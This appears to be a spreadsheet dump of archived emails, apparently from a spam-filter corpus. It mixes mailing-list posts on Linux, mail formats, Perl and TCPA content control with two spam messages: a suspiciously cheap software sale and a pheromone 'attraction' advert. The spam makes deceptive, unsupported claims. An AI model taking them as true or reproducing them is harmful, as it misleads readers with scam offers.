 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/445.gif" alt=3D"DAVID MORGENSTERN" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D27-z9ZmIqI2addnMFcSkMRUVolYrBeR" &gt;&lt;b&gt;Want=
  to stop spam? Here's how YOU do it&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Some of you love SpamNet, a =
 spam-killing app recommended by David Coursey. But others say it blocks too=
  many wanted e-mails, and offer their own tips and tricks for minimizing ju=
 nk e-mail. David rounds up your suggestions. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
         =20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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID BERLIND&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/390.gif" alt=3D"DAVID BERLIND" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D3c-tK4RIcI=
 slDUZNzzzY0VXXjhrHNHyR" &gt;&lt;b&gt;Tablet PCs: Very cool, but not for the masses&lt;/b=
 &gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif"=
  width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 While tablet PCs offer cool features, like letting you scri=
 bble notes on the screen and swivel the display, David's not sure they're r=
 ight for everyone. Why? For starters, they're expensive and impractical for=
  traveling.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3D51-QgUWIjJ=
 PuvC2HDNJlh9GpMUHM3FR" &gt;&lt;b&gt;Keep your PC's clock up to the second! Here's ho=
 w&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.=
 gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Your PC, powerful as it may be, is truly pitiful at keeping=
  track of time. But take heart. Preston has three, free downloads that sync=
 h your PC's clock with atomic-clock servers, guaranteeing you'll always hav=
 e the right time.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D66-kDH_IyWIFd6oGIJsPj9y-Dz=
 bW-9R" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D7b-prT_IBZIOdLyohzbDr4q1O7VpJcR"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rl_login?email=3Dqqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3D91-EZrprxz=
 LcQ2WS04zMKzUVjcon9Yzx9RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3Da6-9zw4QCUBEqVcRtUOvAKcnvjbgw4R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dbb-yT94QYZBR=
 CAbFcWRaT-Dc13yE_rR"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href=3D"http://clickthru.online.com/Click?q=3Dd0-vjDhQWWF=
 rozv0Lo7c7YuNDxuyCiR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3De5-9Z7OQgyw_MN2OwKjnbcu=
 mX6cvbPR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3Dfa-FmqNQhO2Y5fZUOntvDA4oSMpoLnR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D0f-RM2lIqjktmy=
 MDzRsUb9HGRJ1bfeR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D24-8DdMIcz6q-1qRO0geUef92iqrwyR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D3a-QAmgIrzD8mjZonA7JR1rqAFZcCnR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3D4f-Iar4IIU8lz6DSo-8g-rrs=
 LKFK0uR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D64-UBOhIuLfXFWdMQZNGWF8w6YrPhsR" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D79-rsQHIEB=
 fv1GXX4XmFz_e0CvgpaFR"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NL=3De501-01&amp;ISSUE=3D2002-07-11" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3D8e-V=
 e8c-wniKTXbI4M0kFSLkVftLRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] TMDA (WAS --&gt; slashdot EW Dijkstra humor]
</t>
  </si>
  <si>
    <t xml:space="preserve">Shan Ryan suggested:
 &gt; IMHO stopping spammers is a great idea but I'd rather
 &gt; have to hit d or delete rather than have my messages
 &gt; bounced by someone else's ISP.
 You could also change your e-mail to a more responsible provider. If Eircom
 are not up to scratch, then use somebody else and make sure you let Eircom
 know why you think they are so useless. You can still keep your old e-mail
 address if you have to.
 To suggest that ISP's should not protect themselves against incompotent
 configurations would effectively be a vote in support of SPAM.
 - Matthew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</si>
  <si>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Subject: TCPA and Palladium: Content Control for the Masses
</t>
  </si>
  <si>
    <t xml:space="preserve">
 TCPA and Palladium: Content Control for the Masses
 While security experts poke and jab at what bits and pieces
 of the TCPA and Palladium specs they can get ahold of, they
 have tended to focus on how they work and what they imply as
 far as concerns such as privacy and security go, or
 alternatively, in terms of how they would impact the
 functionality of the general purpose logic device.  Analysts
 both favorable and unfavorable have been analyzing them from
 these standpoints, while paying much less attention to what
 the proposals imply from the standpoint of what content
 control itself really means.
 The most significant problem with TCPA and Palladium is not
 whether they may interfere with the power of the universal
 logic device, or whether they are effectual from the
 standpoint of privacy and security concerns, though these
 are all very important concerns.  Rather, the fundamental
 problem they present is in the political premises that they
 hope to implement for the sake of the "content industries."
 TCPA and Palladium are the technological realization of the
 concepts embodied in the WIPO Performances and Phonograms
 Treaty (WPPT), which only came into effect this past May
 20th (with little public notice or fanfare, of course).  The
 WPPT declares an unprecedented "moral right" of authors to
 control public uses of their works.
 *That's* the real game plan.
 TCPA and Palladium are simply content control for the
 masses.  They constitute an effort to "democratize" content
 control under the concept of "moral rights," encouraging the
 public to overlook the clear public interest issues raised
 by the specter of content control, and to confuse these
 issues with private interest issues such as privacy and
 security.  They are an effort to get the public to jump on
 the bandwagon without adequate consideration of what's
 really on the line.
 In America, we have never supported the concept of "moral
 rights" which the WPPT professes.  The US Constitution
 accords Congress the power to grant (or deny) exclusive
 rights to works and inventions for the purpose of promoting
 the progress of the useful arts and sciences, not for the
 purpose of rewarding the originality of creators -- though
 that result is obviously a consequence of exclusive rights
 statutes such as copyright law.  Our Supreme Court
 explicitly articulates this distinction, and for very good
 reason.  In America, we implicitly understand the
 distinction between expression, the aspect of works to which
 copyright statute applies, and the facts and ideas that make
 up a work, to which it does *not* apply.
 The reason for this is essential and unavoidable, and must
 be stated clearly and unequivocally at this juncture:
 information is free.  It's not that it *wants* to be -- it
 *is* and it always has been.  This fact is unassailable,
 however, unless we let come to pass a world that subscribes
 to "universal content control" for the sake of so-called
 "moral rights" implemented at the behest of narrow content
 industry interests.
 TCPA and Palladium are initiatives that hope to encourage
 the general public, and more specifically producers of
 information products in general, to identify content control
 with "moral rights," blithely overlooking the real
 implications of information technology in a free society,
 and the long tradition of American jurisprudence upholding
 the freedom intrinsic to information, a freedom on which the
 prospects of information technology crucially depend.
 Seth Johnson
 -- 
 [CC] Counter-copyright:
 http://cyber.law.harvard.edu/cc/cc.html
 I reserve no rights restricting copying, modification or
 distribution of this incidentally recorded communication. 
 Original authorship should be attributed reasonably, but
 only so far as such an expectation might hold for usual
 practice in ordinary social discourse to which one holds no
 claim of exclusive rights.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: your report ! ufhvv
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;MyDiscountSoftware&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p style="MARGIN: 0px 0px 3px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="MARGIN: 0px 0px 3px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="MARGIN: 0px 0px 3px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="MARGIN: 0px 0px 3px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%" align="center"&gt;&lt;b&gt;&lt;font face="arial, helvetica, sans-serif" color="#0000ff" size="5"&gt;&lt;a href="http://snow.prohosting.com/12201972/homepage"&gt;MyDiscountSoftware,
 Inc.&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="MARGIN: 0px 0px 3px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="MARGIN: 0px 0px 3px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%" align="center"&gt;&lt;b&gt;&lt;a href="http://snow.prohosting.com/12201972/homepage"&gt;&lt;font face="arial, helvetica, sans-serif" color="#ff0000" size="2"&gt;They
 have the lowest software prices you will ever see!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="MARGIN: 0px 0px 3px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="MARGIN: 0px 0px 3px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%" align="center"&gt;Inventory
 closeout sale.&amp;nbsp; This week only.&lt;/p&gt;
 &lt;div align="center"&gt;
   &lt;table bgColor="#ffffcc" border="0"&gt;
     &lt;tbody&gt;
       &lt;tr&gt;
         &lt;td align="middle"&gt;
           &lt;p align="left"&gt;&lt;a href="http://snow.prohosting.com/12201972/homepage"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;&lt;font color="#3300ff"&gt;Adobe
           Photoshop 6.0&lt;/font&gt;&lt;/b&gt;&amp;nbsp; &lt;b&gt;&lt;font color="#ff0000"&gt;79.99!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td align="middle"&gt;
           &lt;p align="left"&gt;&lt;a href="http://snow.prohosting.com/12201972/homepage"&gt;&lt;font size="4"&gt;&lt;b&gt;&lt;font face="arial, helvetica, sans-serif" color="#3300ff"&gt;Microsoft
           Office 2000&lt;/font&gt;&lt;/b&gt;&amp;nbsp; &lt;b&gt;&lt;font face="Arial" color="#ff0000"&gt;69.99!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td align="middle"&gt;
           &lt;p align="left"&gt;&lt;font size="4"&gt;&lt;a href="http://snow.prohosting.com/12201972/homepage"&gt;&lt;b&gt;&lt;font face="arial, helvetica, sans-serif" color="#3300ff"&gt;QuickBooks
           Pro&lt;/font&gt;&lt;/b&gt;&amp;nbsp; &lt;b&gt;&lt;font face="arial, helvetica, sans-serif" color="#ff0000"&gt;59.99!&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td align="middle"&gt;
           &lt;p align="left"&gt;&lt;a href="http://snow.prohosting.com/12201972/homepage"&gt;&lt;font size="4"&gt;&lt;b&gt;&lt;font face="arial, helvetica, sans-serif" color="#3300ff"&gt;Microsoft
           Windows ME&lt;/font&gt;&lt;/b&gt;&amp;nbsp; &lt;font face="arial, helvetica, sans-serif" color="#ff0000"&gt;&lt;b&gt;49.99!&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;center&gt;
       &lt;tr&gt;
         &lt;td align="middle"&gt;
           &lt;p align="center"&gt;&lt;a href="http://snow.prohosting.com/12201972/homepage"&gt;&lt;b&gt;&lt;font size="4"&gt;&lt;font face="arial, helvetica, san serif"&gt;Value
           Package - Get All 4 Titles&lt;/font&gt;&lt;font face="Arial" color="#ff0000"&gt;&amp;nbsp;
           149.99&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;/tbody&gt;
     &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 xnchsuwjfbuyygweqq
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hit the Hotspots
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffff=
 ff" SIZE=3D4 PTSIZE=3D14&gt;&lt;B&gt;&lt;U&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"=
  color=3D"#FF0000"&gt;Best 
 Prices Always&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ff=
 ffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"S=
 ANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#009933" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;BR&gt;
 Experience This &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"=
 BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D=
 "Arial" LANG=3D"0"&gt;POTENT&lt;/FONT&gt;&lt;FONT  COLOR=3D"#009933" BACK=3D"#ffffff" =
 style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSER=
 IF" FACE=3D"Arial" LANG=3D"0"&gt; 
 Pheromone Formula That Helps &lt;BR&gt;
 Men and Women Attract Members of The Opposite Sex &lt;/font&gt;&lt;/B&gt;&lt;FONT  COLOR=3D=
 "#009933" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PT=
 SIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;B&gt;&lt;A HREF=3D"http://discount-shack.com/e.htm"&gt;Click here to learn more:&lt;/=
 A&gt;&lt;BR&gt;
 &lt;/b&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-C=
 OLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LA=
 NG=3D"0"&gt;&lt;BR&gt;
 Ever wonder why some people are always surrounded by members &lt;BR&gt;
 of the opposite sex?&lt;BR&gt;
 Now &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-C=
 OLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LA=
 NG=3D"0"&gt;&lt;B&gt;YOU&lt;/b&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D=
 "BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=
 =3D"Arial" LANG=3D"0"&gt; 
 Can...................&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;*Attract 
 Members of The Opposite Sex Instantly&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D=
 "#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D=
 "SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;B&gt;* 
 &lt;/B&gt;Enhance Your Present Relationship&lt;BR&gt;
 * Meet New People Easily&lt;BR&gt;
 *Give yourself that additional edge&lt;BR&gt;
 * Have people drawn to you, they won't even know why&lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PT=
 SIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;&lt;A HREF=3D"http://discount-shack.com/e.htm"&gt;Here To Visit Our Website&lt;/=
 A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BACKGROUND=
 -COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"arial" =
 LANG=3D"0"&gt;&lt;BR&gt;
 Read What Major News Organisations Are Saying About Pheromones!&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#003333" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D1 PTSIZE=3D8 FAMILY=3D"SANSSERIF" FACE=3D"arial" LANG=3D=
 "0"&gt;&lt;BR&gt;
 &lt;/FONT&gt; 
 &lt;P ALIGN=3DCENTER&gt;&lt;font color=3D"#000000" back=3D"#ffffff" style=3D"BACKGR=
 OUND-COLOR:" #ffffff=3D"#ffffff" size=3D"2" ptsize=3D"8" family=3D"SANSSER=
 IF" face=3D"arial" lang=3D"0"&gt;&lt;a href=3D"mailto:bambi19@uol.com.ar?subject=
 =3Ddelete%20me"&gt;&lt;font size=3D"3"&gt;Delete&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font color=3D#00=
 0000 back=3D#ffffff style=3DBACKGROUND-COLOR: #ffffff size=3D1 ptsize=3D8 =
 family=3DSANSSERIF face=3Darial lang=3D0&gt;&lt;/font&gt;&lt;FONT  COLOR=3D"#000000" B=
 ACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D1 PTSIZE=3D8 FA=
 MILY=3D"SANSSERIF" FACE=3D"arial" LANG=3D"0"&gt;&lt;BR&gt;
   &lt;/font&gt;&lt;/P&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Live forever or die trying
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541007
 Date: Not supplied
 New Scientist is throwing a scavenger hunt with two prizes: "Live forever" and 
 get a gift certificate good for cryonic freezing or "Live now" and take a 
 luxury trip to Hawai'i. Link[1] Discuss[2] (_Thanks, Jens[3]!_)
 [1] http://www.newscientist.com/competition/
 [2] http://www.quicktopic.com/boing/H/hyPgygjHPrevU
 [3] http://www.nosenseofplace.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Cobalt question
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 08-Aug-2002 at 11:31:01 +0100, John P. Looney wrote:
 &gt;  I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the
 &gt; kernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the
 &gt; kernel from ... somewhere else. The old cobalt kernel.
 http://www.gurulabs.com/rgh-cobalt-howto/index.html
 The Cobalt systems have some neat firmware boot code that will read the
 ext2 filesystem and find the kernel itself... if you put it exactly where
 they expect it.
 -- 
 Take care,
 Scott \\'unsch
 ... Old musicians never die, they just decompose.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">quitcherbraggin.
 :-)
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 Sent: Friday, September 06, 2002 3:42 AM
 To: bitbitch@magnesium.net
 Cc: Adam L. Beberg; fork@example.com
 Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 I dunno, BB.  Women who like to be thought of this way should have the
 right to choose to be treated this way.  Men too...  ahem.  (:  My boy
 cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
 of hours I do, sometimes more, if he has to catch up with me.  (:  I
 close him because he is industrious and creative, and because he
 unfailingly makes my bed the minute I get out of it.  And boy #2 will be
 here soon to help boy #1 with other things such as pedicures,  backrubs,
 and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
 have his cake and eat it too, if he can only find the right girl who has
 the same beliefs about gender  roles that he has. Of course, he has NO
 clue where to look, so we will be constantly laughing at him while he
 stumbles around in the dark.
 Cindy
 P.S. the numbers do not in any way indicate importance or favor -- only
 the order in which they move into my house.  -smiles at chris-
 P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
 driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
 like it normally does.  Wish me luck.  I'm going to look for another
 computer job.  Le Sigh.  (:
 On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; Hello Adam,
 &gt;
 &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt;
 &gt;
 &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt;
 &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; so often...  (anyone else want to do the honors?)
 &gt;
 &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
 then
 &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
 she and
 &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded" choices?
 &gt;
 &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; find -love- (which is the crucial distinction between this system) and
 &gt; they marry one another for the satisfaction of being together.   I
 &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; motivator for marrying her, we would not be having this conversation
 &gt; now.
 &gt;
 &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; situations are great, provided everyone is aware that the relationship
 &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; marriage.
 &gt;
 &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; blame law school and my cat.
 &gt;
 &gt; -BB
 &gt;
 &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; ALB&gt;   beberg@mithral.com
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;
 --
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-28
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * .NET and Perl, Working Together
 +--------------------------------------------------------------------+
 | .NET and Perl, Working Together                                    |
 |   posted by pudge on Tuesday August 27, @09:17 (links)             |
 |   http://use.perl.org/article.pl?sid=02/08/27/1317253              |
 +--------------------------------------------------------------------+
 [0]jonasbn writes "DevX has brought an article on the subject of [1]Perl
 and .NET and porting existing code. The teaser: Learn how CPAN Perl
 modules can be made automatically available to the .NET framework. The
 technique involves providing small PerlNET mediators between Perl and
 .NET and knowing when, where, and how to modify."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/27/1317253
 Links:
     0. mailto:jonasbn@io.dk
     1. http://www.devx.com/dotnet/articles/ym81502/ym81502-1.asp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</si>
  <si>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--==_Exmh_1405404058P
 Content-Type: text/plain; charset=us-ascii
 Jason Rennie &lt;jrennie@ai.mit.edu&gt; writes:
 &gt; My sysadmins have told me that the sending mail client is supposed to 
 &gt; escape lines begining with "From ".  EXMH (2.5) doesn't do this.  Should 
 &gt; it?  It appears that my MH is MH 6.8.  Does NMH fix this?
 Actually, this issue used to escalate into a religious war. The "From " 
 envelope is an artifact of the mbox mailbox format, and from that 
 perspective it should be the mail server that stores its mailboxes in
 mbox format that should be responsible for escaping lines beginning with 
 "From ". On the other hand, this breaks the assumption that the mail 
 transport only touches the message headers and leaves the message body 
 alone.
 Things like pgp signatures break when the mail server changes the message 
 body.
 Also, strictly speaking, the mbox format envelope (or for us old-timers, 
 the UUCP envelope) isn't just any line beginning with "From ". It's really 
 "From", a single space, a valid email address, two spaces, and a valid 
 date.
 For example:
     From ptardif@nbnet.nb.ca  Sun Jul 14 08:53:57 2002
         ^                   ^^
 -- 
 John Abreau / Executive Director, Boston Linux &amp; Unix 
 IM: jabr@jabber.blu.org / abreauj@aim / abreauj@yahoo / 28611923@icq
 Email jabr@blu.org / WWW http://www.abreau.net / PGP-Key-ID 0xD5C7B5D9
 PGP-Key-Fingerprint 72 FB 39 4F 3C 3B D6 5B E0 C8 5A 6E F1 2C BE 99
    Some people say, "The enemy of my enemy is my friend."
    I often respond, "When elephants fight, it's the grass
    that gets trampled."
 --==_Exmh_1405404058P
 Content-Type: application/pgp-signature
